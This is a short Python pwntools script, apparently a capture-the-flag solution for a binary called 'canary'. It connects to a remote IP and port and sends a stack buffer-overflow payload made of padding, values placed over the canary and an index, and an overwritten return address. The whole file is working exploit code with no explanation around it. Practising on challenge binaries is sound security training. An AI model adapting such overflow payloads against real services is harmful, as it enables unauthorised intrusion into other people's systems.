#!/usr/bin/python
from pwn import *
#______________________________________________________________________________________________________________
rem = "18.222.227.1 12345"
cmd = "./canary"
local = 0
#______________________________________________________________________________________________________________
if bool(local): p = process(cmd.split(' ')); raw_input("-PID");
else: rem = rem.split(' '); p = remote(rem[0], rem[1])
#______________________________________________________________________________________________________________

ret = 0x080486c1
#       padding     canary  index   padding ret-value
payload = "A"*40 + p32(0) + p32(1) + "A"*8 + p32(ret)
p.send(payload)
print p.recvall()

#______________________________________________________________________________________________________________
if bool(local): raw_input("-END")
p.close()
